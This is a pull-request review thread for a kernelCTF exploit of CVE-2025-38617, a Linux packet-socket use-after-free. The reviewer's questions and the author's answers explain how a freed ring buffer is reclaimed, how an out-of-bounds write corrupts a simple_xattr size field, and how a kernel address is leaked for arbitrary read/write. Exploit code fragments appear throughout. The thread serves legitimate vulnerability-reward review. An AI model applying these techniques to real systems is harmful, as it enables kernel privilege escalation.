Add kernelCTF CVE-2025-38617_mitigation_cos#339

Open
quanggle97 wants to merge 34 commits into google:master from quanggle97:master

@quanggle97
Contributor

No description provided.

@quanggle97
Contributor Author

@koczkatamas The pull request is ready for review.

Collaborator

@koczkatamas koczkatamas left a comment

Hey!

Your exploit code and writeup are very long, and although they explain a lot of details, they are very hard to follow, and it is hard to get a quick understanding of what exactly is happening.

So I have a few questions:

Q1. Which kernel structures (struct XXX within the kernel source) are freed and then used due to the UAF? Which fields of those objects are used (those relevant to the exploitation)?

Q2. What object did you spray in pages_order2_read_primitive to allocate in the space of the UAF'd object from Q1?

Q3. My understanding is that you can overwrite a simple_xattr's structure size field via the original vulnerability in pages_order2_read_primitive.

Let's say simple_xattr looks like this:

struct simple_xattr {
        struct rb_node             rb_node;              /*     0    24 */
        char *                     name;                 /*    24     8 */
        size_t                     size;                 /*    32     8 */
        char                       value[];              /*    40     0 */
};

What is the effect of the vulnerability you are using? Out-of-bounds write of 8 bytes? How / where in the source code exactly do you set the right offset (the offset of the size field)? What cache (in case of SLAB) or order of pages (in case of BUDDY) are you writing from to which cache/pages?

Where do you set the length of the write? (Is it filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);?)

If you'd like to overwrite only 8 bytes, why don't you send an 8-byte-long packet? To get into the right cache?

Are the other fields (like rb_node, name, or value) overwritten, or does your primitive allow a precise 8-byte overwrite of only the size field?

What other constraints do you have for this primitive? Can you choose any offset and size, or are there any restrictions?

Q4. From which object's which field do you leak leaked_content_simple_xattr_kernel_address?

Do I understand correctly that you reuse the original OOB overwrite primitive to overwrite a pgv[] order-2 page to be able to mmap the address of the leaked_content_simple_xattr and modify its values to get the simple_xattr_read_write primitive?

Which fields do you use for the RW purpose? name or value+size? Where in the source code are these fields set?

Q5. Why do you need the abr_page_read_write_primitive when you could also RW with the simple_xattr_read_write_primitive?
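
For reference, the field offsets quoted in Q3 can be checked with a small userspace mirror of the layout. This is only a sketch: the types rb_node_mirror and simple_xattr_mirror and the helper simple_xattr_size_offset are hypothetical names, not kernel or exploit code, and the layout assumes a 64-bit build where pointers and unsigned long are 8 bytes.

```c
#include <stddef.h>

/* Assumed mirror of the kernel's struct rb_node: three pointer-sized
 * words (24 bytes) on a 64-bit build. */
struct rb_node_mirror {
    unsigned long parent_color;
    struct rb_node_mirror *right;
    struct rb_node_mirror *left;
};

/* Mirror of the simple_xattr layout quoted in Q3. */
struct simple_xattr_mirror {
    struct rb_node_mirror rb_node; /* offset  0, size 24 */
    char *name;                    /* offset 24, size  8 */
    size_t size;                   /* offset 32, size  8 */
    char value[];                  /* offset 40, flexible array */
};

/* Compile-time checks: the build fails if the assumed layout is wrong. */
_Static_assert(offsetof(struct simple_xattr_mirror, name) == 24, "name offset");
_Static_assert(offsetof(struct simple_xattr_mirror, size) == 32, "size offset");
_Static_assert(offsetof(struct simple_xattr_mirror, value) == 40, "value offset");

/* Offset of the size field from the start of the object. */
size_t simple_xattr_size_offset(void)
{
    return offsetof(struct simple_xattr_mirror, size);
}
```

An 8-byte write that starts at this offset would cover exactly the size field and stop where value[] begins, which is the precision Q3 asks about.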

rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
rx_ring.tp_sizeof_priv = 16248;
Collaborator

@koczkatamas koczkatamas Feb 27, 2026

Is this the place where you adjust the offset to be written? How exactly do you calculate this offset? Please use struct sizes and field offsets in the calculation so that it is clear how this works.

Contributor Author

Q1: The ring buffer is freed (it is represented by struct pgv, which is basically an array of kernel pointers).
Q2: Another ring buffer is used for reclamation.
Q3: The vulnerability lets me perform an OOB write with a controlled size and a controlled offset. I believe I described how the exploit controls the offset in the UAF section. The packet is allocated in packet_sendmsg_spkt(), which has a check inside dev_validate_header() that does not allow a packet with a length of 8 bytes. I specifically chose to overwrite only the size field. I could build a generic page overflow primitive, but I decided to just pick the numbers that fit my strategy.
Q4: Yes.
Q5: The simple_xattr_read_write_primitive only allows us to read and write that one struct simple_xattr object; it is not an arbitrary (abr) read/write. I just want to keep the simple_xattr_read_write_primitive alive. If we freed that struct simple_xattr object, we might fail to reclaim it with the object we want.
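
As a partial illustration of the offset question, the arithmetic for where a TPACKET_V3 block places its first frame can be sketched as below. This is not the author's calculation. It assumes that the kernel starts the first frame at the 8-byte-aligned block descriptor plus the 8-byte-aligned private area, that sizeof(struct tpacket_block_desc) is 48 bytes, and that pages are 4 KiB. All names in the block are hypothetical.

```c
/* Assumptions, not taken from the exploit source. */
#define PAGE_SIZE_ASSUMED   4096UL
#define PAGES_ORDER2_BYTES  (PAGE_SIZE_ASSUMED << 2) /* 16384 */
#define V3_ALIGNMENT        8UL
#define BLOCK_DESC_SIZE     48UL /* assumed sizeof(struct tpacket_block_desc) */

/* Round x up to the next multiple of a (a must be a power of two). */
#define ALIGN_UP(x, a)      (((x) + (a) - 1) & ~((a) - 1))

/* Offset of the first frame inside a block: aligned block descriptor
 * followed by the aligned private area (tp_sizeof_priv). */
unsigned long first_frame_offset(unsigned long sizeof_priv)
{
    return ALIGN_UP(BLOCK_DESC_SIZE, V3_ALIGNMENT) +
           ALIGN_UP(sizeof_priv, V3_ALIGNMENT);
}

/* Bytes between the first frame and the end of an order-2 region.
 * Only meaningful while first_frame_offset() is below 16384. */
unsigned long room_before_order2_end(unsigned long sizeof_priv)
{
    return PAGES_ORDER2_BYTES - first_frame_offset(sizeof_priv);
}
```

Under these assumptions, tp_sizeof_priv = 16248 gives a first-frame offset of 16296, which is 88 bytes before the end of a 16384-byte order-2 region. The per-frame header and tp_reserve then shift where the packet data itself lands; that part is described in the writeup's UAF section and is not reproduced here.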

Comment on lines 1473 to 1505
struct tpacket_req3 tx_ring = {};
tx_ring.tp_block_size = PAGES_ORDER1_SIZE;
tx_ring.tp_block_nr = 1;
tx_ring.tp_frame_size = PAGES_ORDER1_SIZE;
tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr;

struct tpacket_req3 rx_ring = {};
rx_ring.tp_block_size = PAGES_ORDER3_SIZE;
rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
rx_ring.tp_sizeof_priv = 16248;
rx_ring.tp_retire_blk_tov = USHRT_MAX;

struct sock_filter filter[MAX_FILTER_LEN] = {};
for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
    filter[i].code = BPF_LD | BPF_IMM;
    filter[i].k = 0xcafebabe;
}

filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
filter[MAX_FILTER_LEN - 1].k = sizeof(void *);

primitive->victim_packet_socket_config = victim_packet_socket_config_create(
    (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo
    (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr
    tx_ring, // tx_ring
    rx_ring, // rx_ring
    1, // packet_loss
    TPACKET_V3, // packet_version
    30, // packet_reserve
    filter // filter
);
Collaborator

Significant code duplication for setting up packet socket configuration rings and BPF filters.

Recommendation: Extract the common packet socket configuration logic into a dedicated utility function.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

primitive->victim_packet_socket_config = util_create_shared_packet_socket_config();

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
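
One possible shape for such a helper, sketched under assumptions: make_ring_req is a hypothetical name, and the parameter list only covers the tpacket_req3 fields that the quoted snippet sets. It keeps the per-call values (block size, block count, private size) explicit, since those are what differ between configurations.

```c
#include <linux/if_packet.h>

/* Hypothetical helper: build a tpacket_req3 and derive tp_frame_nr
 * from the other fields, as the quoted snippet does by hand. */
struct tpacket_req3 make_ring_req(unsigned int block_size,
                                  unsigned int block_nr,
                                  unsigned int frame_size,
                                  unsigned int sizeof_priv,
                                  unsigned int retire_blk_tov)
{
    struct tpacket_req3 req = {0};

    req.tp_block_size = block_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_size = frame_size;
    /* Frames per block times number of blocks. */
    req.tp_frame_nr = block_size / frame_size * block_nr;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_retire_blk_tov = retire_blk_tov;
    return req;
}
```

With a helper like this, the tx_ring in the snippet would become something like make_ring_req(PAGES_ORDER1_SIZE, 1, PAGES_ORDER1_SIZE, 0, 0), leaving the exploit-specific numbers visible at the call site.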

Contributor Author

As I commented above, I did not build a generic page overflow primitive. Part of the packet socket configuration is used to build that page overflow primitive. For example, if I want to perform a PAGES_ORDER3_SIZE overflow, I choose a victim ring buffer size of PAGES_ORDER4_SIZE and a reclamation ring buffer size of PAGES_ORDER3_SIZE. packet_reserve can be modified to affect the overwrite offset too. I think I described these in the UAF section.
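
The sizing relationship in this reply can be written down as a short sketch. It assumes 4 KiB pages and that a PAGES_ORDERn_SIZE constant means PAGE_SIZE << n; the names PAGES_ORDER_SIZE and overflow_span are hypothetical and not taken from the exploit.

```c
/* Assumed: 4 KiB pages, order-n region = PAGE_SIZE << n. */
#define PAGE_SIZE_ASSUMED        4096UL
#define PAGES_ORDER_SIZE(order)  (PAGE_SIZE_ASSUMED << (order))

/* Number of bytes by which a write sized for the victim block can run
 * past a smaller reclaimed block. Returns 0 when the reclaimed block
 * is not smaller than the victim block. */
unsigned long overflow_span(unsigned int victim_order,
                            unsigned int reclaim_order)
{
    unsigned long victim = PAGES_ORDER_SIZE(victim_order);
    unsigned long reclaim = PAGES_ORDER_SIZE(reclaim_order);

    return victim > reclaim ? victim - reclaim : 0;
}
```

For the example in the reply, overflow_span(4, 3) equals PAGES_ORDER_SIZE(3): an order-4 victim block over an order-3 reclaimed block leaves one order-3 region of overflow.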


alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE);
void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0);
void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);
Collaborator

Variable name mem1 is too generic and similar to mem.

Recommendation: Use a descriptive name representing the specific mapping, such as fake_xattr_mem.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *fake_xattr_mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Contributor Author

At that point, these addresses are freed, and the expectation is that a struct pgv object is successfully reclaimed at one of them. I kept the names mem and mem1 to reflect that, at this point, the exploit still does not know what is actually at these addresses.


bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive)
{
    void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive);
Collaborator

Too generic variable name 'tmp' used for primitive output.

Recommendation: Rename the variable to reflect its contents, such as leaked_data.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *leaked_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Contributor Author

Done.

Comment on lines 1447 to 1453
if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) {
    pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = next;
    pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
} else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) {
    pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = prev;
    pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
}
Collaborator

Logic to set kernel address variables is duplicated verbatim across if/else blocks.

Recommendation: Refactor the logic to determine the valid address first, then assign the variables in a single shared block.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

u64 valid_addr = ((next & (PAGES_ORDER2_SIZE - 1)) == 0) ? next : prev;
pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = valid_addr;
pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = valid_addr + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
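
Note that the original if / else-if assigns nothing when neither pointer is order-2 aligned, whereas a plain ternary would fall back to prev in that case. A behavior-preserving variant might look like the sketch below. The helper names pick_order2_aligned and leaked_content_address are hypothetical, and PAGES_ORDER2_SIZE is assumed to be four 4 KiB pages.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGES_ORDER2_SIZE (4096UL << 2) /* assumed: 4 KiB pages, order 2 */

/* Pick whichever neighbour pointer is order-2 aligned, preferring next.
 * Returns false and leaves *out untouched when neither is aligned, which
 * matches the original if / else-if that assigns nothing in that case. */
bool pick_order2_aligned(uint64_t next, uint64_t prev, uint64_t *out)
{
    if ((next & (PAGES_ORDER2_SIZE - 1)) == 0)
        *out = next;
    else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0)
        *out = prev;
    else
        return false;
    return true;
}

/* Shared computation that both original branches duplicated. */
uint64_t leaked_content_address(uint64_t overflowed_addr, unsigned int idx)
{
    return overflowed_addr + ((uint64_t)idx + 1) * PAGES_ORDER2_SIZE;
}
```

The caller would assign both struct fields only when pick_order2_aligned returns true, so the duplicated expression appears once and the "neither aligned" case stays a no-op.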

Contributor Author

Done.

rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
rx_ring.tp_sizeof_priv = 16248;
Collaborator

Usage of an unexplained magic number.

Recommendation: Replace the magic number with a descriptive macro or add an explanatory comment.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

    rx_ring.tp_sizeof_priv = TPACKET_SIZEOF_PRIV_VALUE; /* 16248 */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Contributor Author

Again, I did not build a generic page overflow function. If I had to use a descriptive macro, it would look like TPACKET_SIZEOF_PRIV_VALUE_TO_KEEP_THE_UNCONTROLLED_WRITE_DATA_NEAR_THE_END_OF_RECLAMATION_BUFFER_FROM_RING_BUFFER ...

struct sock_filter filter[MAX_FILTER_LEN] = {};
for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
    filter[i].code = BPF_LD | BPF_IMM;
    filter[i].k = 0xcafebabe;
Collaborator

Unexplained magic number used in BPF filter.

Recommendation: Define the magic number as a macro or document its irrelevance.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

        filter[i].k = BPF_PLACEHOLDER_VALUE; /* 0xcafebabe */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
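
For context, a classic BPF socket filter returns the number of packet bytes to keep, so the final BPF_RET | BPF_K instruction acts as a truncation length while the preceding BPF_LD | BPF_IMM instructions only load a constant. A minimal sketch of building such a filter with a named placeholder follows. The names FILTER_PADDING_IMM and fill_truncating_filter are hypothetical, and the sketch does not claim to explain why the exploit pads the filter to MAX_FILTER_LEN.

```c
#include <stddef.h>
#include <linux/filter.h>

/* Hypothetical name: the immediate loaded by the padding instructions.
 * The value is never used for a decision, only loaded into the accumulator. */
#define FILTER_PADDING_IMM 0xcafebabeU

/* Fill filter[0..len-2] with constant loads and end with a return that
 * keeps snap_len bytes of each packet. Does nothing when len is 0. */
void fill_truncating_filter(struct sock_filter *filter, size_t len,
                            unsigned int snap_len)
{
    if (len == 0)
        return;

    for (size_t i = 0; i + 1 < len; i++)
        filter[i] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_IMM,
                                                 FILTER_PADDING_IMM);

    filter[len - 1] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, snap_len);
}
```

Calling fill_truncating_filter(filter, MAX_FILTER_LEN, sizeof(void *)) would produce the same instruction sequence as the quoted loop, with the placeholder documented in one place.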

Contributor Author

Done.
